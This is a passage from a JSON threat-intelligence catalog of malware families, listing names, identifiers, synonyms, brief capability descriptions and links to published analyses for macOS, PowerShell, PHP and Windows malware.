"https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", "https://twitter.com/JohnLaTwC/status/915590893155098629" ], "synonyms": [], "type": [] }, "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", "value": "Maintools.js" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f", "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef" ], "synonyms": [], "type": [] }, "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", "value": "Unidentified 050 (APT32 Profiler)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" ], "synonyms": [], "type": [] }, "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", "value": "witchcoven" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", "https://github.com/kai5263499/Bella", "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", "value": "Bella" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" ], "synonyms": [ "Appetite", "Mask" ], "type": [] }, "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", "value": "Careto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" ], "synonyms": [], "type": [] }, "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", "value": "CoinThief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", "https://objective-see.com/blog/blog_0x2A.html" ], "synonyms": [], "type": [] }, "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", "value": "Coldroot RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" ], "synonyms": [], "type": [] }, "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", "value": "CpuMeaner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", "https://objective-see.com/blog/blog_0x29.html", "https://digitasecurity.com/blog/2018/02/05/creativeupdater/" ], "synonyms": [], "type": [] }, "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", "value": "CreativeUpdater" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" ], "synonyms": [], "type": [] }, "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", "value": "Crisis (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" ], "synonyms": [], "type": [] }, "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", "value": "Crossrider" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", "https://www.f-secure.com/weblog/archives/00002466.html" ], "synonyms": [], "type": [] }, "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", "value": "Dockster" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", "https://objective-see.com/blog/blog_0x32.html" ], "synonyms": [], "type": [] }, "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", "value": "Dummy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", "https://github.com/Marten4n6/EvilOSX", "https://twitter.com/JohnLaTwC/status/966139336436498432" ], "synonyms": [], "type": [] }, "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", "value": "EvilOSX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" ], "synonyms": [], "type": [] }, "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", "value": "FlashBack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" ], "synonyms": [ "Quimitchin" ], "type": [] }, "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", "value": "FruitFly" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" ], "synonyms": [], "type": [] }, "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", "value": "HiddenLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" ], "synonyms": [ "Revir" ], "type": [] }, "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", "value": "iMuler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", "https://objective-see.com/blog/blog_0x16.html", "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html", "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/" ], "synonyms": [], "type": [] }, "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", "value": "KeRanger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", "https://objective-see.com/blog/blog_0x16.html", "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", "https://github.com/eset/malware-ioc/tree/master/keydnap" ], "synonyms": [], "type": [] }, "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", "value": "Keydnap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", "https://www.f-secure.com/weblog/archives/00002558.html" ], "synonyms": [ "KitM" ], "type": [] }, "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", "value": "Kitmos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://objective-see.com/blog/blog_0x16.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/" ], "synonyms": [ "JHUHUGIT", "JKEYSKW", "SedUploader" ], "type": [] }, "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", "value": "Komplex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", "https://objective-see.com/blog/blog_0x16.html", "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" ], "synonyms": [], "type": [] }, "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", "value": "Laoshu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis", "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/" ], "synonyms": [], "type": [] }, "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", "value": "Leverage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", "https://iranthreats.github.io/resources/macdownloader-macos-malware/" ], "synonyms": [], "type": [] }, "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", "value": "MacDownloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", "value": "MacInstaller" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", "https://objective-see.com/blog/blog_0x1E.html", "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service" ], "synonyms": [], "type": [] }, "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", "value": "MacRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" ], "synonyms": [], "type": [] }, "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", "value": "MacSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", "value": "MacVX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", "https://objective-see.com/blog/blog_0x26.html" ], "synonyms": [], "type": [] }, "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", "value": "MaMi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", "https://objective-see.com/blog/blog_0x20.html" ], "synonyms": [], "type": [] }, "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", "value": "Mughthesec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" ], "synonyms": [], "type": [] }, "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", "value": "OceanLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", "https://news.drweb.com/show/?i=1750&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", "value": "Olyx" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" ], "synonyms": [ "Findzip" ], "type": [] }, "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", "value": "Patcher" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" ], "synonyms": [], "type": [] }, "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", "value": "Pirrit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/", "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", "https://securelist.com/calisto-trojan-for-macos/86543/", "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/", "https://objective-see.com/blog/blog_0x1F.html", "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://objective-see.com/blog/blog_0x1D.html", "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" ], "synonyms": [ "Calisto" ], "type": [] }, "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", "value": "Proton RAT" }, { "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" ], "synonyms": [], "type": [] }, "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", "value": "Pwnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/" ], "synonyms": [ "Retefe" ], "type": [] }, "uuid": "80acc956-d418-42e3-bddf-078695a01289", "value": "Dok" }, { "description": "General purpose backdoor", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" ], "synonyms": [], "type": [] }, "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", "value": "systemd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" ], "synonyms": [], "type": [] }, "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", "https://401trg.pw/winnti-evolution-going-open-source/", " https://401trg.pw/an-update-on-winnti/" ], "synonyms": [], "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": "Winnti (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", "https://objective-see.com/blog/blog_0x16.html", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" ], "synonyms": [], "type": [] }, "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", "value": "WireLurker (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", "value": "Wirenet (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/", "https://twitter.com/PhysicalDrive0/status/845009226388918273", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf" ], "synonyms": [], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", "https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", "value": "XSLCmd" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" ], "synonyms": [], "type": [] }, "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", "value": "PAS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", "https://github.com/wso-shell", "https://securelist.com/energetic-bear-crouching-yeti/85345/" ], "synonyms": [ "Webshell by Orb" ], "type": [] }, "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", "value": "WSO" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", "value": "Silence DDoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" ], "synonyms": [], "type": [] }, "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", "value": "BONDUPDATER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" ], "synonyms": [], "type": [] }, "uuid": "0db05333-2214-49c3-b469-927788932aaa", "value": "GhostMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", "https://github.com/matthewdunwoody/POSHSPY" ], "synonyms": [], "type": [] }, "uuid": "4df1b257-c242-46b0-b120-591430066b6f", "value": "POSHSPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" ], "synonyms": [], "type": [] }, "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", "value": "PowerWare" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" ], "synonyms": [], "type": [] }, "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", "value": "POWRUNER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" ], "synonyms": [], "type": [] }, "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", "value": "QUADAGENT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/" ], "synonyms": [], "type": [] }, "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", "value": "RogueRobin" }, { "description": "sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload", "https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9", "https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy", "https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/", "https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html" ], "synonyms": [], "type": [] }, "uuid": "e78c0259-9299-4e55-b934-17c6a3ac4bc2", "value": "sLoad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", "https://github.com/Kevin-Robertson/Tater" ], "synonyms": [], "type": [] }, "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", "value": "Tater PrivEsc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", "https://github.com/Mr-Un1k0d3r/ThunderShell" ], "synonyms": [], "type": [] }, "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", "value": "ThunderShell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" ], "synonyms": [], "type": [] }, "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", "value": "WMImplant" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/", "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f", "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A", "http://seclists.org/fulldisclosure/2017/Mar/7" ], "synonyms": [], "type": [] }, "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", "value": "BrickerBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", "https://www.youtube.com/watch?v=Bk-utzAlYFI" ], "synonyms": [], "type": [] }, "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", "value": "Saphyra" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" ], "synonyms": [], "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", "value": "FlexiSpy (symbian)" }, { "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" ], "synonyms": [], "type": [] }, "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", "value": "7ev3n" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", "https://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/6894315", "http://researchcenter.paloaltonetworks.com/2016/07/unit-42-attack-delivers-9002-trojan-through-google-drive/", "https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html", "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/", "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" ], "synonyms": [ "Hydraq", "McRAT" ], "type": [] }, "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", "value": "9002 RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/", "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" ], "synonyms": [ "PinkKite" ], "type": [] }, "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", "value": "AbaddonPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abantes", "https://github.com/ElektroKill/AbantesTrojan" ], "synonyms": [], "type": [] }, "uuid": "27b54000-26b5-405f-9296-9fbc9217a8c9", "value": "abantes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" ], "synonyms": [], "type": [] }, "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", "value": "Abbath Banker" }, { "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" ], "synonyms": [], "type": [] }, "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", "value": "AcridRain" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" ], "synonyms": [], "type": [] }, "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", "value": "Acronym" }, { "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016", "https://twitter.com/JaromirHorejsi/status/813712587997249536" ], "synonyms": [], "type": [] }, "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", "value": "AdamLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", 